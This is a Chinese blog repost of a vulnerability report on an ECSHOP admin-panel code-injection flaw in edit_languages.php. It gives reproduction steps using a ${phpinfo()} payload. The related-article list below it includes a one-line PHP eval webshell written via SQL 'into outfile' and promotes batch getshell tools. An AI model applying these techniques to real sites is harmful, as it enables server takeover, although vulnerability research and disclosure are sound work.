ECSHOP后台getshell漏洞

最新推荐文章于 2024-08-20 09:07:08 发布
最新推荐文章于 2024-08-20 09:07:08 发布
阅读量5.8k 收藏 1
点赞数
分类专栏: ecshop网店系统二次开发 php

ECSHOP后台getshell漏洞

2014年03月20日00:55 阅读: 1733 次

标签: ECSHOP后台getshell漏洞

简要描述:

ECSHOP 后台getshell


详细说明: 


admin/edit_languages.php



elseif ($_REQUEST['act'] == 'edit')

{

    /* 语言项的路径 */

    $lang_file = isset($_POST['file_path']) ? trim($_POST['file_path']) : '';



    /* 替换前的语言项 */

    $src_items = !empty($_POST['item']) ? stripslashes_deep($_POST['item']) : '';



    /* 修改过后的语言项 */

    $dst_items = array();

    $_POST['item_id'] = stripslashes_deep($_POST['item_id']);



    for ($i = 0; $i < count($_POST['item_id']); $i++)

    {

        /* 语言项内容如果为空,不修改 */

        if (trim($_POST['item_content'][$i]) == '')

        {

            unset($src_items[$i]);

        }

        else

        {

            $_POST['item_content'][$i] = str_replace('\\\\n', '\\n', $_POST['item_content'][$i]);

            $dst_items[$i] = $_POST['item_id'][$i] .' = '. '"' .$_POST['item_content'][$i]. '";';//这里改成了双引号 可以用${ phpinfo()}来执行代码~~

        }

    }


漏洞证明:

测试方法

打开 127.0.0.1/ec/admin/edit_languages.php

搜索1

随便找一下 修改 值为${ phpinfo()}

然后抓包 点击确认

查看下filepath的参数

file_path=..%2Flanguages%2Fzh_cn%2Fuser.php

就知道修改的语言文件的名字 完了之后访问即可




修复方案:

你猜

文章整理编辑源自,黑客安全焦点:http://www.chncto.com/转载请尊重版权,谢谢合作!
zhangfeng1133
关注
专栏目录
127.网络安全渗透测试—[CMS后台 getwebshell]—[ecshop3.6后台 getwebshell]
qwsn
07-11 2812
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 进入后台,访问该页面:抓包,送入repeater模块,改为post模式,把此时请求体的act=edit_templates,放到get处请求体写入以下内容:(写入test.php,密码为a) ,然后点击订单列表—>点击查看—>点击,从而生成test.php蚁剑访问连接...
apache的网站配置目录_网站后台getshell的方法总结
weixin_39977776的博客
11-06 586
方法一:直接上传getshell以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下:即可成功上传大马,并成功执行,从而拿下webshell。坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用../跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名方法二:数据库备份getshell以南方数据cms为例:1,首先上传一张图片马...
ecshop最新后台shell
06-18
ecshop最新后台shell
admin/edit_languages.php,ECSHOP后台getshell
weixin_42507981的博客
03-26 118
elseif ($_REQUEST['act'] == 'edit'){/* 语言项的路径 */$lang_file = isset($_POST['file_path']) ? trim($_POST['file_path']) : '';/* 替换前的语言项 */$src_items = !empty($_POST['item']) ? stripslashes_deep($_POST['it...
getshell开源项目安装与使用指南
最新发布
gitblog_01079的博客
08-20 251
getshell开源项目安装与使用指南 getshell各大平台提权工具项目地址:https://gitcode.com/gh_mirrors/ge/getshell 项目概述 该项目getshell托管在GitHub上,地址为:https://github.com/klsfct/getshell.git。然而,提供的引用内容并未直接提供关于特定开源项目getshell的详细信息,包括其目录结构...
ecshop后台getshell
qq_45300786的博客
05-14 1504
他所信奉的这盏绿灯,这个一年年在我们眼前渐渐远去的极乐的未来,它从前逃离了我们的追求,不过那没关系,明天我们跑的更快一点,把胳膊伸得更远一点,等待某个美好的早晨,于是我们奋力向前,逆水行舟,直到回到美好往昔的纯真岁月。 现在我们试试第三种方法 访问这个地址, 然后抓包修改为POST,并添加如下框内代码 放包 然后随便找个订单查看 点击“打印订单” 点击“打印订单”后,就会生成一个test.php文件 shell工具连接 ...
Ecshop后台shell方法总结
11-25 6725
方法一:龙儿心发明的,版本未定,估计都行。 进入后台-系统设置-Flash播放器管理 可以上传任意文件。 [includes/fckeditor /editor/filemanager/connectors/php/config.php文件对Media没有任何限制,直接Type=Media 上传你的webshell,访问路径为http://target/images/upload/M
admin/edit_languages.php,ECSHOP后台getshell漏洞
weixin_39828457的博客
03-26 221
### 简要描述:ECSHOP 后台getshell### 详细说明:```admin/edit_languages.phpelseif ($_REQUEST['act'] == 'edit'){/* 语言项的路径 */$lang_file = isset($_POST['file_path']) ? trim($_POST['file_path']) : '';/* 替换前的语言项 */$src...
网站后台getshell的方法总结
L_lemo004的博客
07-12 6004
方法一:直接上传getshell 以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下: 即可成功上传大马,并成功执行,从而拿下webshell。 坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用…/跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名 方法二:数据库备份getshell 以南方数据cms为例: 1,首先上传一张图片马...
getshell2aaaaaaaa
03-28
### getshell2aaaaaaaa #### 安全领域中的拿Shell技巧概览 在网络安全与渗透测试领域,获取系统或Web应用的“Shell”访问权限是一项重要的技术能力。这不仅有助于安全人员评估系统的安全性,还能帮助他们识别潜在...
ECShop-v3.0.0漏洞复现
weixin_50866517的博客
08-16 1804
ECShop-v3.0.0漏洞复现配置文件写入导致代码执行二级目录三级目录 配置文件写入导致代码执行 在\ECShop -v3.0.0\install\index.php文件的第207-227行中,使用POST请求接收配置信息的值,并且直接传入到create_config_file方法。 case 'create_config_file' : $db_host = isset($_POST['db_host']) ? trim($_POST['db_host']) : '';
批量getshell工具
09-08
2017最新版的批量getshell工具,最全的cms识别系统,最快的getshell行动,各种cms,各种漏洞,各种getshell,你值得拥有!
integrate.php 漏洞,ECShop网店系统<=V2.6.2 后台拿webshell
weixin_34337678的博客
03-17 150
ECSHOP前段时间出了个注射漏洞:http://bbs.wolvez.org/topic/67/,拿后台权限应该没有问题,但文章没有提及如何在后台shell。昨天可乐在t00ls.Net上发帖问如何拿shell,无聊中我baidu、google了下,网上貌似没有拿shell的办法。好久没读代码了,无聊中下了ECSHOP最新版(V2.6.2)的源码过来读,很庆幸,给我找到一个可以直接写shell...
getshell工具下载批量ecshop4.0全版本通杀工具下载
zdaskmfhsrgkena的博客
04-07 2854
下载:http://www.mediafire.com/file/w0bkjb55w9jnpr0/EcShop4.0.zip/file EcShop4.0版本以下的漏洞利用工具,配合url采集器根据关键字挖掘出网址导入到这个工具里,批量测无敌,适合全自动shell小兄弟。 ...
ecshop 通杀2.6*2.7 GBK版本 oday 爆路径 GetShell
weixin_33814685的博客
07-24 240
据说该0day是fjhgx(俺是农村的)大牛发现的。。。 Exp等黑小子发吧。。。或者自己手动也行。。。 以前很早的东西了 刚测试还可以用 至于有一些能不能搞 自行测试 这些东西都可以想起以前的兄弟们 我对这些已经不敢兴趣了 有什么好东西我会陆续放出 工具我会打包! ecshop 通杀2.6*2.7 GBK版本 附上测试图! (射出编码...
Ecshop框架的Webshell
wo41ge的博客
12-19 297
一、登录情况 因为后台没有放东西 嘛 所以就啥也没有 这是后台地址 http://127.0.0.1/ecshop/admin/ 二、后台拿webshell三种思路演示 1、执行数据库命令拿webshell 首先需要找到可写入命令的页面: select '<?php eval($_POST[1])?>' into outfile' 最后经过测试?和into outfile都会报错 这里可以利用符号代替或者混淆的方式替换掉,最终的思路是写入一句话 在into outfile写入到改
测试过程中用shell的地方_记一次后台 getshell 测试过程
weixin_34856548的博客
12-30 123
记一次后台 getshell 测试过程最近团队在对某个厂商进行测试,在进入后台后的情况下进行黑盒测试,这次 webshell 差点被厂商以“管理员身份进行 webshell 为由”给我个低危评价,后面在我据理力争之下最终保住了,此漏洞在最新版本中也修复了首先进入后台是这样子的:通常后台最容易出现漏洞的地方在哪里呢?在日常渗透测试过程中,进入后台后,首先考虑的是系统管理模块,该模块通常是控制整个...
记一次游戏私服getshell过程
zhangge3663的博客
10-30 611
晚上闲着无聊,想做点事情,用fofa搜了一下站点,想挖几个洞,结果看到了一个游戏私服的宣传网站,我这一看跟我之前搞过的一个站好像是一套源码。就试着想搞一搞,正好记录一下写个文章,废话不多说了,开搞。 传统的游戏宣传页面,没啥东西 试着一下输入了一下这套私服源码的后台目录,果真是一摸一样,跳到后台了~ 这套源码用的是aspcms,这版本后台有个文件未验证管理员权限,因此如何人都可以访问,同时该文件对获取参数没有使用自定义的filterPara函数过滤,导致sql注入,但是前提你得需要知道后台的目录.
记一次实战getshell后台
派大李的博客
10-27 591
起源 今天也是在宿舍肥宅的一天~~老大突然发来一条信息,故事就开始了。 看起来似乎是个注入点,你懂的,直接神器一把梭(^o^)/ 牛逼,不愧是神器,数据出来了,Mysql数据库,不过是user低权限的,作用不大。 跑出后台账号和密码,看下网站后台吧~~ 完蛋,找把天没找着后台,扫描了一下端口,发现开放了很多端口,估计是一个站点服务器吧… 没找到利用的点getshell,不想这样就放了 找找旁站吧,看下有入口点吗。。。 找了半天发现一个可以利用的站点,发现后台登录,还没有验证码防御,直接BP爆破~~~ …半小
ecshop getshell工具
07-11
Ecshop getshell工具是指一种用于攻击Ecshop电商系统的工具。Getshell是指通过各种手段成功获取到系统的远程控制权限,从而能够对系统进行非法操作和操控。 Ecshop是一款非常受欢迎的开源电商系统,它提供了丰富的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值